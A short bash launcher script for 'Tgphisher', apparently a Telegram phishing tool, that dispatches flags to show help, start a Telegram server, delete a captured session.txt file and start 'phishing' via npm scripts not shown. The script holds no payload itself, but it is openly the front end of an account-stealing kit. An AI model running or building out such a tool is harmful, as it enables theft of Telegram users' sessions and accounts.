#!/usr/bin/env bash

cd /root/Tgphisher || { echo "Failed to enter the directory => /root/Tgphisher"; exit 1; }

tgphisher(){
  case "$1 $2" in
    "-t --help")
      sudo bash help.sh 
      ;;
    "-s --telegram")
      server 
      ;;
    "-d session.txt")
    rm -rf /root/Tgphisher/script/session.txt
      ;;
    "-s --phisher")
      host
      ;;
    *)
      echo "Erro! Unknown command: $1"
      exit 1
      ;;
  esac
}

server(){
  echo "[::] Starting server..."
  npm run telegram 
}

host(){
  echo "[::] Starting phishing..."
   npm run tgphisher
}

tgphisher "$@"
